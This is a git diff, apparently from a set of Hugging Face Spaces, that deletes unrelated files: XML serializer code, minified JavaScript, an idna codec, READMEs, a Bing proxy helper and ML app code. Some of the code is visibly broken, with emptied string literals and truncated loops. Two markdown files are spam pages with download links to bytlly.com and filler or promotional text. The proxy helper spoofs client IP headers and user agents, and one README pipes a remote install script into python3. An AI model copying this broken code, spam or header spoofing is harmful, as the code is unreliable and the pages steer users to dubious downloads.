calculate serialized qname representation - try: - qname = _tounicode(qname) - if qname[:1] == "{": - uri, tag = qname[1:].rsplit("}", 1) - prefix = namespaces.get(uri) - if prefix is None: - prefix = _namespace_map.get(uri) - if prefix is None: - prefix = "ns%d" % len(namespaces) - else: - prefix = _tounicode(prefix) - if prefix != "xml": - namespaces[uri] = prefix - if prefix: - qnames[qname] = "%s:%s" % (prefix, tag) - else: - qnames[qname] = tag # default element - else: - qnames[qname] = qname - except TypeError: - _raise_serialization_error(qname) - - # populate qname and namespaces table - for elem in elem.iter(): - tag = elem.tag - if isinstance(tag, QName): - if tag.text not in qnames: - add_qname(tag.text) - elif isinstance(tag, str): - if tag not in qnames: - add_qname(tag) - elif tag is not None and tag is not Comment and tag is not PI: - _raise_serialization_error(tag) - for key, value in elem.items(): - if isinstance(key, QName): - key = key.text - if key not in qnames: - add_qname(key) - if isinstance(value, QName) and value.text not in qnames: - add_qname(value.text) - text = elem.text - if isinstance(text, QName) and text.text not in qnames: - add_qname(text.text) - return qnames, namespaces - - def _serialize_xml(write, elem, qnames, namespaces, **kwargs): - tag = elem.tag - text = elem.text - if tag is Comment: - write("" % _tounicode(text)) - elif tag is ProcessingInstruction: - write("" % _tounicode(text)) - else: - tag = qnames[_tounicode(tag) if tag is not None else None] - if tag is None: - if text: - write(_escape_cdata(text)) - for e in elem: - _serialize_xml(write, e, qnames, None) - else: - write("<" + tag) - if namespaces: - for uri, prefix in sorted( - namespaces.items(), key=lambda x: x[1] - ): # sort on prefix - if prefix: - prefix = ":" + prefix - write(' xmlns%s="%s"' % (prefix, _escape_attrib(uri))) - attrs = elem.attrib - if attrs: - # try to keep existing attrib order - if len(attrs) <= 1 or type(attrs) is _Attrib: - items = attrs.items() - else: - # if plain dict, use lexical order - items = sorted(attrs.items()) - for k, v in items: - if isinstance(k, QName): - k = _tounicode(k.text) - else: - k = _tounicode(k) - if isinstance(v, QName): - v = qnames[_tounicode(v.text)] - else: - v = _escape_attrib(v) - write(' %s="%s"' % (qnames[k], v)) - if text is not None or len(elem): - write(">") - if text: - write(_escape_cdata(text)) - for e in elem: - _serialize_xml(write, e, qnames, None) - write("") - else: - write("/>") - if elem.tail: - write(_escape_cdata(elem.tail)) - - def _raise_serialization_error(text): - raise TypeError("cannot serialize %r (type %s)" % (text, type(text).__name__)) - - def _escape_cdata(text): - # escape character data - try: - text = _tounicode(text) - # it's worth avoiding do-nothing calls for short strings - if "&" in text: - text = text.replace("&", "&") - if "<" in text: - text = text.replace("<", "<") - if ">" in text: - text = text.replace(">", ">") - return text - except (TypeError, AttributeError): - _raise_serialization_error(text) - - def _escape_attrib(text): - # escape attribute value - try: - text = _tounicode(text) - if "&" in text: - text = text.replace("&", "&") - if "<" in text: - text = text.replace("<", "<") - if ">" in text: - text = text.replace(">", ">") - if '"' in text: - text = text.replace('"', """) - if "\n" in text: - text = text.replace("\n", " ") - return text - except (TypeError, AttributeError): - _raise_serialization_error(text) - - def _indent(elem, level=0): - # From http://effbot.org/zone/element-lib.htm#prettyprint - i = "\n" + level * " " - if len(elem): - if not elem.text or not elem.text.strip(): - elem.text = i + " " - if not elem.tail or not elem.tail.strip(): - elem.tail = i - for elem in elem: - _indent(elem, level + 1) - if not elem.tail or not elem.tail.strip(): - elem.tail = i - else: - if level and (not elem.tail or not elem.tail.strip()): - elem.tail = i diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/dockerfile-d67bbd50.js b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/dockerfile-d67bbd50.js deleted file mode 100644 index 5405cd3af19be5d8cb56dbb55aefa442653e888a..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/dockerfile-d67bbd50.js +++ /dev/null @@ -1,2 +0,0 @@ -function c(n){a(n,"start");var t={},e=n.languageData||{},s=!1;for(var l in n)if(l!=e&&n.hasOwnProperty(l))for(var u=t[l]=[],o=n[l],r=0;r2&&o.token&&typeof o.token!="string"){e.pending=[];for(var g=2;g-1)return null;var l=e.indent.length-1,u=n[e.state];n:for(;;){for(var o=0;o=!&|~$:]/,t;function p(e,n){t=null;var r=e.next();if(r=="#")return e.skipToEnd(),"comment";if(r=="0"&&e.eat("x"))return e.eatWhile(/[\da-f]/i),"number";if(r=="."&&e.eat(/\d/))return e.match(/\d*(?:e[+\-]?\d+)?/),"number";if(/\d/.test(r))return e.match(/\d*(?:\.\d+)?(?:e[+\-]\d+)?L?/),"number";if(r=="'"||r=='"')return n.tokenize=E(r),"string";if(r=="`")return e.match(/[^`]+`/),"string.special";if(r=="."&&e.match(/.(?:[.]|\d+)/))return"keyword";if(/[a-zA-Z\.]/.test(r)){e.eatWhile(/[\w\.]/);var i=e.current();return h.propertyIsEnumerable(i)?"atom":N.propertyIsEnumerable(i)?(A.propertyIsEnumerable(i)&&!e.match(/\s*if(\s+|$)/,!1)&&(t="block"),"keyword"):m.propertyIsEnumerable(i)?"builtin":"variable"}else return r=="%"?(e.skipTo("%")&&e.next(),"variableName.special"):r=="<"&&e.eat("-")||r=="<"&&e.match("<-")||r=="-"&&e.match(/>>?/)||r=="="&&n.ctx.argList?"operator":k.test(r)?(r=="$"||e.eatWhile(k),"operator"):/[\(\){}\[\];]/.test(r)?(t=r,r==";"?"punctuation":null):null}function E(e){return function(n,r){if(n.eat("\\")){var i=n.next();return i=="x"?n.match(/^[a-f0-9]{2}/i):(i=="u"||i=="U")&&n.eat("{")&&n.skipTo("}")?n.next():i=="u"?n.match(/^[a-f0-9]{4}/i):i=="U"?n.match(/^[a-f0-9]{8}/i):/[0-7]/.test(i)&&n.match(/^[0-7]{1,2}/),"string.special"}else{for(var l;(l=n.next())!=null;){if(l==e){r.tokenize=p;break}if(l=="\\"){n.backUp(1);break}}return"string"}}}var v=1,u=2,c=4;function o(e,n,r){e.ctx={type:n,indent:e.indent,flags:0,column:r.column(),prev:e.ctx}}function x(e,n){var r=e.ctx;e.ctx={type:r.type,indent:r.indent,flags:r.flags|n,column:r.column,prev:r.prev}}function a(e){e.indent=e.ctx.indent,e.ctx=e.ctx.prev}const I={name:"r",startState:function(e){return{tokenize:p,ctx:{type:"top",indent:-e,flags:u},indent:0,afterIdent:!1}},token:function(e,n){if(e.sol()&&(n.ctx.flags&3||(n.ctx.flags|=u),n.ctx.flags&c&&a(n),n.indent=e.indentation()),e.eatSpace())return null;var r=n.tokenize(e,n);return r!="comment"&&!(n.ctx.flags&u)&&x(n,v),(t==";"||t=="{"||t=="}")&&n.ctx.type=="block"&&a(n),t=="{"?o(n,"}",e):t=="("?(o(n,")",e),n.afterIdent&&(n.ctx.argList=!0)):t=="["?o(n,"]",e):t=="block"?o(n,"block",e):t==n.ctx.type?a(n):n.ctx.type=="block"&&r!="comment"&&x(n,c),n.afterIdent=r=="variable"||r=="keyword",r},indent:function(e,n,r){if(e.tokenize!=p)return 0;var i=n&&n.charAt(0),l=e.ctx,d=i==l.type;return l.flags&c&&(l=l.prev),l.type=="block"?l.indent+(i=="{"?0:r.unit):l.flags&v?l.column+(d?0:1):l.indent+(d?0:r.unit)},languageData:{wordChars:".",commentTokens:{line:"#"},autocomplete:b.concat(g,s)}};export{I as r}; -//# sourceMappingURL=r-3ca97919.js.map diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/idna/codec.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/idna/codec.py deleted file mode 100644 index 1ca9ba62c208527b796b49306f4b8c95eb868a51..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/idna/codec.py +++ /dev/null @@ -1,112 +0,0 @@ -from .core import encode, decode, alabel, ulabel, IDNAError -import codecs -import re -from typing import Tuple, Optional - -_unicode_dots_re = re.compile('[\u002e\u3002\uff0e\uff61]') - -class Codec(codecs.Codec): - - def encode(self, data: str, errors: str = 'strict') -> Tuple[bytes, int]: - if errors != 'strict': - raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) - - if not data: - return b"", 0 - - return encode(data), len(data) - - def decode(self, data: bytes, errors: str = 'strict') -> Tuple[str, int]: - if errors != 'strict': - raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) - - if not data: - return '', 0 - - return decode(data), len(data) - -class IncrementalEncoder(codecs.BufferedIncrementalEncoder): - def _buffer_encode(self, data: str, errors: str, final: bool) -> Tuple[str, int]: # type: ignore - if errors != 'strict': - raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) - - if not data: - return "", 0 - - labels = _unicode_dots_re.split(data) - trailing_dot = '' - if labels: - if not labels[-1]: - trailing_dot = '.' - del labels[-1] - elif not final: - # Keep potentially unfinished label until the next call - del labels[-1] - if labels: - trailing_dot = '.' - - result = [] - size = 0 - for label in labels: - result.append(alabel(label)) - if size: - size += 1 - size += len(label) - - # Join with U+002E - result_str = '.'.join(result) + trailing_dot # type: ignore - size += len(trailing_dot) - return result_str, size - -class IncrementalDecoder(codecs.BufferedIncrementalDecoder): - def _buffer_decode(self, data: str, errors: str, final: bool) -> Tuple[str, int]: # type: ignore - if errors != 'strict': - raise IDNAError('Unsupported error handling \"{}\"'.format(errors)) - - if not data: - return ('', 0) - - labels = _unicode_dots_re.split(data) - trailing_dot = '' - if labels: - if not labels[-1]: - trailing_dot = '.' - del labels[-1] - elif not final: - # Keep potentially unfinished label until the next call - del labels[-1] - if labels: - trailing_dot = '.' - - result = [] - size = 0 - for label in labels: - result.append(ulabel(label)) - if size: - size += 1 - size += len(label) - - result_str = '.'.join(result) + trailing_dot - size += len(trailing_dot) - return (result_str, size) - - -class StreamWriter(Codec, codecs.StreamWriter): - pass - - -class StreamReader(Codec, codecs.StreamReader): - pass - - -def getregentry() -> codecs.CodecInfo: - # Compatibility as a search_function for codecs.register() - return codecs.CodecInfo( - name='idna', - encode=Codec().encode, # type: ignore - decode=Codec().decode, # type: ignore - incrementalencoder=IncrementalEncoder, - incrementaldecoder=IncrementalDecoder, - streamwriter=StreamWriter, - streamreader=StreamReader, - ) diff --git a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/markdown_it/helpers/__init__.py b/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/markdown_it/helpers/__init__.py deleted file mode 100644 index 3dbbdd1d480ecc5ace6529f9005d40d5985529ae..0000000000000000000000000000000000000000 --- a/spaces/ky2k/Toxicity_Classifier_POC/.venv/lib/python3.9/site-packages/markdown_it/helpers/__init__.py +++ /dev/null @@ -1,6 +0,0 @@ -"""Functions for parsing Links -""" -__all__ = ("parseLinkLabel", "parseLinkDestination", "parseLinkTitle") -from .parse_link_destination import parseLinkDestination -from .parse_link_label import parseLinkLabel -from .parse_link_title import parseLinkTitle diff --git a/spaces/lavanyaparise/myenAIchatbot/README.md b/spaces/lavanyaparise/myenAIchatbot/README.md deleted file mode 100644 index 1de0a72fbf0e47879420bc975210acafbf96a776..0000000000000000000000000000000000000000 --- a/spaces/lavanyaparise/myenAIchatbot/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: MyenAIchatbot -emoji: 🌖 -colorFrom: purple -colorTo: purple -sdk: gradio -sdk_version: 3.39.0 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/leilevy/bingo/src/lib/utils.ts b/spaces/leilevy/bingo/src/lib/utils.ts deleted file mode 100644 index 760ab389d213df20c359d7993475fe3bf9031bff..0000000000000000000000000000000000000000 --- a/spaces/leilevy/bingo/src/lib/utils.ts +++ /dev/null @@ -1,154 +0,0 @@ -import { clsx, type ClassValue } from 'clsx' -import { customAlphabet } from 'nanoid' -import { twMerge } from 'tailwind-merge' -import { debug } from './isomorphic' - -export function cn(...inputs: ClassValue[]) { - return twMerge(clsx(inputs)) -} - -export const nanoid = customAlphabet( - '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz', - 7 -) // 7-character random string - -export function createChunkDecoder() { - const decoder = new TextDecoder() - return function (chunk: Uint8Array | undefined): string { - if (!chunk) return '' - return decoder.decode(chunk, { stream: true }) - } -} - -export function random (start: number, end: number) { - return start + Math.ceil(Math.random() * (end - start)) -} - -export function randomIP() { - return `11.${random(104, 107)}.${random(1, 255)}.${random(1, 255)}` -} - -export const defaultUID = 'xxx' - -export function parseHeadersFromCurl(content: string) { - const re = /-H '([^:]+):\s*([^']+)/mg - const headers: HeadersInit = {} - content = content.replaceAll('-H "', '-H \'').replaceAll('" ^', '\'\\').replaceAll('^\\^"', '"') // 将 cmd curl 转成 bash curl - content.replace(re, (_: string, key: string, value: string) => { - headers[key] = value - return '' - }) - - return headers -} - -export const ChunkKeys = ['BING_HEADER', 'BING_HEADER1', 'BING_HEADER2'] -export function encodeHeadersToCookie(content: string) { - const base64Content = btoa(content) - const contentChunks = base64Content.match(/.{1,4000}/g) || [] - return ChunkKeys.map((key, index) => `${key}=${contentChunks[index] ?? ''}`) -} - -export function extraCurlFromCookie(cookies: Partial<{ [key: string]: string }>) { - let base64Content = '' - ChunkKeys.forEach((key) => { - base64Content += (cookies[key] || '') - }) - try { - return atob(base64Content) - } catch(e) { - return '' - } -} - -export function extraHeadersFromCookie(cookies: Partial<{ [key: string]: string }>) { - return parseHeadersFromCurl(extraCurlFromCookie(cookies)) -} - -export function formatDate(input: string | number | Date): string { - const date = new Date(input) - return date.toLocaleDateString('en-US', { - month: 'long', - day: 'numeric', - year: 'numeric' - }) -} - -export function parseCookie(cookie: string, cookieName: string) { - const targetCookie = new RegExp(`(?:[; ]|^)${cookieName}=([^;]*)`).test(cookie) ? RegExp.$1 : cookie - return targetCookie ? decodeURIComponent(targetCookie).trim() : cookie.indexOf('=') === -1 ? cookie.trim() : '' -} - -export function setCookie(key: string, value: string) { - const maxAge = value ? 86400 * 30 : 0 - document.cookie = `${key}=${value || ''}; Path=/; Max-Age=${maxAge}; SameSite=None; Secure` -} - -export function getCookie(cookieName: string) { - const re = new RegExp(`(?:[; ]|^)${cookieName}=([^;]*)`) - return re.test(document.cookie) ? RegExp.$1 : '' -} - -export function parseCookies(cookie: string, cookieNames: string[]) { - const cookies: { [key: string]: string } = {} - cookieNames.forEach(cookieName => { - cookies[cookieName] = parseCookie(cookie, cookieName) - }) - return cookies -} - -export const DEFAULT_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.0.0' -export const DEFAULT_IP = process.env.BING_IP || randomIP() - -export function parseUA(ua?: string, default_ua = DEFAULT_UA) { - return / EDGE?/i.test(decodeURIComponent(ua || '')) ? decodeURIComponent(ua!.trim()) : default_ua -} - -export function mockUser(cookies: Partial<{ [key: string]: string }>) { - const { - BING_UA = process.env.BING_UA, - BING_IP = process.env.BING_IP, - _U = defaultUID, - } = cookies - const ua = parseUA(BING_UA) - - return { - 'x-forwarded-for': BING_IP || DEFAULT_IP, - 'Accept-Encoding': 'gzip, deflate, br', - 'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6', - 'User-Agent': ua!, - 'x-ms-useragent': 'azsdk-js-api-client-factory/1.0.0-beta.1 core-rest-pipeline/1.10.0 OS/Win32', - cookie: `_U=${_U}` || '', - } -} - -export function createHeaders(cookies: Partial<{ [key: string]: string }>, type?: string) { - let { - BING_HEADER = process.env.BING_HEADER, - IMAGE_ONLY = process.env.IMAGE_ONLY ?? '1', - } = cookies - const imageOnly = /^(1|true|yes)$/.test(String(IMAGE_ONLY)) - if (BING_HEADER) { - if ( - (imageOnly && type === 'image') - || !imageOnly - ) { - return extraHeadersFromCookie({ - BING_HEADER, - ...cookies, - }) || {} - } - } - return mockUser(cookies) -} - -export class WatchDog { - private tid = 0 - watch(fn: Function, timeout = 2000) { - clearTimeout(this.tid) - this.tid = setTimeout(fn, timeout + Math.random() * 1000) - } - reset() { - clearTimeout(this.tid) - } -} diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/Can You Change Serial Number In Bios BETTER.md b/spaces/lincquiQcaudo/Top-20-Diffusion/Can You Change Serial Number In Bios BETTER.md deleted file mode 100644 index 7cc60a2d2f549ab52b27c3fed4a32d2ea7485afd..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/Can You Change Serial Number In Bios BETTER.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Can You Change Serial Number In Bios


    DOWNLOAD ✺✺✺ https://bytlly.com/2uGxvA



    - -How to Find Serial Number of Windows PC Information Sometimes abbreviated ... If you are running a VM you can change it quite easily by just typing something ... Note: if you have updated your BIOS since buying it, don`t be ... 4d29de3e1b
    -
    -
    -

    diff --git a/spaces/lincquiQcaudo/Top-20-Diffusion/Master Game Pc Pesawat Tempur ((BETTER)).md b/spaces/lincquiQcaudo/Top-20-Diffusion/Master Game Pc Pesawat Tempur ((BETTER)).md deleted file mode 100644 index e716ab83c3e20fba27772b30be29c1074c301385..0000000000000000000000000000000000000000 --- a/spaces/lincquiQcaudo/Top-20-Diffusion/Master Game Pc Pesawat Tempur ((BETTER)).md +++ /dev/null @@ -1,16 +0,0 @@ -
    -

    Master Game Pc Pesawat Tempur: The Ultimate Flight Simulator for PC Gamers

    -

    If you are a fan of flight simulators and aerial combat games, you might want to check out Master Game Pc Pesawat Tempur, a new game developed by an Indonesian studio. This game lets you experience the thrill of flying and fighting in various types of aircraft, from modern jets to classic warplanes.

    -

    Master Game Pc Pesawat Tempur features realistic graphics, physics, and sound effects that will immerse you in the cockpit of your chosen plane. You can customize your aircraft with different weapons, skins, and upgrades, and test your skills in various missions and modes. You can also challenge other players online or team up with them in co-op mode.

    -

    Master Game Pc Pesawat Tempur


    DOWNLOAD ✓✓✓ https://bytlly.com/2uGw1b



    -

    Master Game Pc Pesawat Tempur is compatible with Windows 10 and supports keyboard, mouse, joystick, and VR devices. You can download the game from Steam or the official website. If you are looking for a flight simulator that combines realism, fun, and variety, Master Game Pc Pesawat Tempur might be the game for you.

    - -

    One of the main attractions of Master Game Pc Pesawat Tempur is the variety of aircraft that you can fly and fight with. The game features over 50 different planes, ranging from modern fighters like the F-22 Raptor and the Su-35 Flanker to historical warplanes like the Spitfire and the Zero. Each plane has its own characteristics, strengths, and weaknesses, and you can learn how to master them in the tutorial mode.

    -

    -

    The game also offers a wide range of missions and scenarios that will test your flying and combat skills. You can take part in dogfights, bombing runs, escort missions, stealth operations, and more. You can also choose from different difficulty levels and weather conditions to suit your preference. The game has a dynamic campaign mode that adapts to your performance and choices, as well as a sandbox mode that lets you create your own scenarios.

    -

    Another feature of Master Game Pc Pesawat Tempur is the online multiplayer mode, where you can compete or cooperate with other players from around the world. You can join or create a server and choose from various modes, such as team deathmatch, capture the flag, king of the hill, and more. You can also chat with other players using voice or text communication. The game has a ranking system that tracks your stats and achievements, and a leaderboard that shows your position among other players.

    - -

    In addition to the gameplay features, Master Game Pc Pesawat Tempur also boasts impressive graphics and sound effects that enhance the realism and immersion of the game. The game uses a high-quality engine that renders detailed landscapes, weather effects, and lighting effects. The game also supports 4K resolution and HDR technology for a stunning visual experience. The sound effects are also realistic and dynamic, with authentic engine noises, explosions, and radio chatter. The game also has a catchy soundtrack that matches the mood and pace of the game.

    -

    Master Game Pc Pesawat Tempur is a game that will appeal to both casual and hardcore gamers who enjoy flight simulators and aerial combat games. The game offers a lot of content, variety, and challenge that will keep you entertained for hours. The game is also easy to play and accessible to anyone who wants to try it. Whether you want to fly solo or with friends, Master Game Pc Pesawat Tempur is a game that you should not miss.

    d5da3c52bf
    -
    -
    \ No newline at end of file diff --git a/spaces/lj1995/vocal2guitar/docs/README.en.md b/spaces/lj1995/vocal2guitar/docs/README.en.md deleted file mode 100644 index 1df5839ad420e5bbcb564c92853ec415bee7da44..0000000000000000000000000000000000000000 --- a/spaces/lj1995/vocal2guitar/docs/README.en.md +++ /dev/null @@ -1,104 +0,0 @@ -
    - -

    Retrieval-based-Voice-Conversion-WebUI

    -An easy-to-use Voice Conversion framework based on VITS.

    - -[![madewithlove](https://forthebadge.com/images/badges/built-with-love.svg)](https://github.com/liujing04/Retrieval-based-Voice-Conversion-WebUI) - -
    - -[![Open In Colab](https://img.shields.io/badge/Colab-F9AB00?style=for-the-badge&logo=googlecolab&color=525252)](https://colab.research.google.com/github/liujing04/Retrieval-based-Voice-Conversion-WebUI/blob/main/Retrieval_based_Voice_Conversion_WebUI.ipynb) -[![Licence](https://img.shields.io/github/license/liujing04/Retrieval-based-Voice-Conversion-WebUI?style=for-the-badge)](https://github.com/liujing04/Retrieval-based-Voice-Conversion-WebUI/blob/main/%E4%BD%BF%E7%94%A8%E9%9C%80%E9%81%B5%E5%AE%88%E7%9A%84%E5%8D%8F%E8%AE%AE-LICENSE.txt) -[![Huggingface](https://img.shields.io/badge/🤗%20-Spaces-yellow.svg?style=for-the-badge)](https://huggingface.co/lj1995/VoiceConversionWebUI/tree/main/) - -[![Discord](https://img.shields.io/badge/RVC%20Developers-Discord-7289DA?style=for-the-badge&logo=discord&logoColor=white)](https://discord.gg/HcsmBBGyVk) - -
    - ------- -[**Changelog**](https://github.com/liujing04/Retrieval-based-Voice-Conversion-WebUI/blob/main/Changelog_CN.md) | [**FAQ (Frequently Asked Questions)**](https://github.com/RVC-Project/Retrieval-based-Voice-Conversion-WebUI/wiki/FAQ-(Frequently-Asked-Questions)) - -[**English**](./README.en.md) | [**中文简体**](../README.md) | [**日本語**](./README.ja.md) | [**한국어**](./README.ko.md) ([**韓國語**](./README.ko.han.md)) - -> Check our [Demo Video](https://www.bilibili.com/video/BV1pm4y1z7Gm/) here! - -> Realtime Voice Conversion Software using RVC : [w-okada/voice-changer](https://github.com/w-okada/voice-changer) - -> The dataset for the pre-training model uses nearly 50 hours of high quality VCTK open source dataset. - -> High quality licensed song datasets will be added to training-set one after another for your use, without worrying about copyright infringement. -## Summary -This repository has the following features: -+ Reduce tone leakage by replacing source feature to training-set feature using top1 retrieval; -+ Easy and fast training, even on relatively poor graphics cards; -+ Training with a small amount of data also obtains relatively good results (>=10min low noise speech recommended); -+ Supporting model fusion to change timbres (using ckpt processing tab->ckpt merge); -+ Easy-to-use Webui interface; -+ Use the UVR5 model to quickly separate vocals and instruments. -## Preparing the environment -We recommend you install the dependencies through poetry. - -The following commands need to be executed in the environment of Python version 3.8 or higher: -```bash -# Install PyTorch-related core dependencies, skip if installed -# Reference: https://pytorch.org/get-started/locally/ -pip install torch torchvision torchaudio - -#For Windows + Nvidia Ampere Architecture(RTX30xx), you need to specify the cuda version corresponding to pytorch according to the experience of https://github.com/liujing04/Retrieval-based-Voice-Conversion-WebUI/issues/21 -#pip install torch torchvision torchaudio --index-url https://download.pytorch.org/whl/cu117 - -# Install the Poetry dependency management tool, skip if installed -# Reference: https://python-poetry.org/docs/#installation -curl -sSL https://install.python-poetry.org | python3 - - -# Install the project dependencies -poetry install -``` -You can also use pip to install the dependencies - -```bash -pip install -r requirements.txt -``` - -## Preparation of other Pre-models -RVC requires other pre-models to infer and train. - -You need to download them from our [Huggingface space](https://huggingface.co/lj1995/VoiceConversionWebUI/tree/main/). - -Here's a list of Pre-models and other files that RVC needs: -```bash -hubert_base.pt - -./pretrained - -./uvr5_weights - -If you want to test the v2 version model (the v2 version model has changed the input from the 256 dimensional feature of 9-layer Hubert+final_proj to the 768 dimensional feature of 12-layer Hubert, and has added 3 period discriminators), you will need to download additional features - -./pretrained_v2 - -#If you are using Windows, you may also need this dictionary, skip if FFmpeg is installed -ffmpeg.exe -``` -Then use this command to start Webui: -```bash -python infer-web.py -``` -If you are using Windows, you can download and extract `RVC-beta.7z` to use RVC directly and use `go-web.bat` to start Webui. - -There's also a tutorial on RVC in Chinese and you can check it out if needed. - -## Credits -+ [ContentVec](https://github.com/auspicious3000/contentvec/) -+ [VITS](https://github.com/jaywalnut310/vits) -+ [HIFIGAN](https://github.com/jik876/hifi-gan) -+ [Gradio](https://github.com/gradio-app/gradio) -+ [FFmpeg](https://github.com/FFmpeg/FFmpeg) -+ [Ultimate Vocal Remover](https://github.com/Anjok07/ultimatevocalremovergui) -+ [audio-slicer](https://github.com/openvpi/audio-slicer) -## Thanks to all contributors for their efforts - - - - - diff --git a/spaces/lris/anime-remove-background/app.py b/spaces/lris/anime-remove-background/app.py deleted file mode 100644 index 230a0d5f8a3da6ab18ecb8db1cd90016a489b96a..0000000000000000000000000000000000000000 --- a/spaces/lris/anime-remove-background/app.py +++ /dev/null @@ -1,52 +0,0 @@ -import gradio as gr -import huggingface_hub -import onnxruntime as rt -import numpy as np -import cv2 - - -def get_mask(img, s=1024): - img = (img / 255).astype(np.float32) - h, w = h0, w0 = img.shape[:-1] - h, w = (s, int(s * w / h)) if h > w else (int(s * h / w), s) - ph, pw = s - h, s - w - img_input = np.zeros([s, s, 3], dtype=np.float32) - img_input[ph // 2:ph // 2 + h, pw // 2:pw // 2 + w] = cv2.resize(img, (w, h)) - img_input = np.transpose(img_input, (2, 0, 1)) - img_input = img_input[np.newaxis, :] - mask = rmbg_model.run(None, {'img': img_input})[0][0] - mask = np.transpose(mask, (1, 2, 0)) - mask = mask[ph // 2:ph // 2 + h, pw // 2:pw // 2 + w] - mask = cv2.resize(mask, (w0, h0))[:, :, np.newaxis] - return mask - - -def rmbg_fn(img): - mask = get_mask(img) - img = (mask * img + 255 * (1 - mask)).astype(np.uint8) - mask = (mask * 255).astype(np.uint8) - img = np.concatenate([img, mask], axis=2, dtype=np.uint8) - mask = mask.repeat(3, axis=2) - return mask, img - - -if __name__ == "__main__": - providers = ['CUDAExecutionProvider', 'CPUExecutionProvider'] - model_path = huggingface_hub.hf_hub_download("skytnt/anime-seg", "isnetis.onnx") - rmbg_model = rt.InferenceSession(model_path, providers=providers) - app = gr.Blocks() - with app: - gr.Markdown("# Anime Remove Background\n\n" - "![visitor badge](https://visitor-badge.glitch.me/badge?page_id=skytnt.animeseg)\n\n" - "demo for [https://github.com/SkyTNT/anime-segmentation/](https://github.com/SkyTNT/anime-segmentation/)") - with gr.Row(): - with gr.Column(): - input_img = gr.Image(label="input image") - examples_data = [[f"examples/{x:02d}.jpg"] for x in range(1, 4)] - examples = gr.Dataset(components=[input_img], samples=examples_data) - run_btn = gr.Button(variant="primary") - output_mask = gr.Image(label="mask") - output_img = gr.Image(label="result", image_mode="RGBA") - examples.click(lambda x: x[0], [examples], [input_img]) - run_btn.click(rmbg_fn, [input_img], [output_mask, output_img]) - app.launch() diff --git a/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.h b/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.h deleted file mode 100644 index 60b81c6058d54638a6d74a13046fa388442d767d..0000000000000000000000000000000000000000 --- a/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.h +++ /dev/null @@ -1,38 +0,0 @@ -// Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -//------------------------------------------------------------------------ -// CUDA kernel parameters. - -struct bias_act_kernel_params -{ - const void* x; // [sizeX] - const void* b; // [sizeB] or NULL - const void* xref; // [sizeX] or NULL - const void* yref; // [sizeX] or NULL - const void* dy; // [sizeX] or NULL - void* y; // [sizeX] - - int grad; - int act; - float alpha; - float gain; - float clamp; - - int sizeX; - int sizeB; - int stepB; - int loopX; -}; - -//------------------------------------------------------------------------ -// CUDA kernel selection. - -template void* choose_bias_act_kernel(const bias_act_kernel_params& p); - -//------------------------------------------------------------------------ diff --git a/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.py b/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.py deleted file mode 100644 index b2b53d7da34c76d53251bb9cbc2eb071c50af921..0000000000000000000000000000000000000000 --- a/spaces/ludusc/latent-space-theories/torch_utils/ops/bias_act.py +++ /dev/null @@ -1,209 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Custom PyTorch ops for efficient bias and activation.""" - -import os -import numpy as np -import torch -import dnnlib - -from .. import custom_ops -from .. import misc - -#---------------------------------------------------------------------------- - -activation_funcs = { - 'linear': dnnlib.EasyDict(func=lambda x, **_: x, def_alpha=0, def_gain=1, cuda_idx=1, ref='', has_2nd_grad=False), - 'relu': dnnlib.EasyDict(func=lambda x, **_: torch.nn.functional.relu(x), def_alpha=0, def_gain=np.sqrt(2), cuda_idx=2, ref='y', has_2nd_grad=False), - 'lrelu': dnnlib.EasyDict(func=lambda x, alpha, **_: torch.nn.functional.leaky_relu(x, alpha), def_alpha=0.2, def_gain=np.sqrt(2), cuda_idx=3, ref='y', has_2nd_grad=False), - 'tanh': dnnlib.EasyDict(func=lambda x, **_: torch.tanh(x), def_alpha=0, def_gain=1, cuda_idx=4, ref='y', has_2nd_grad=True), - 'sigmoid': dnnlib.EasyDict(func=lambda x, **_: torch.sigmoid(x), def_alpha=0, def_gain=1, cuda_idx=5, ref='y', has_2nd_grad=True), - 'elu': dnnlib.EasyDict(func=lambda x, **_: torch.nn.functional.elu(x), def_alpha=0, 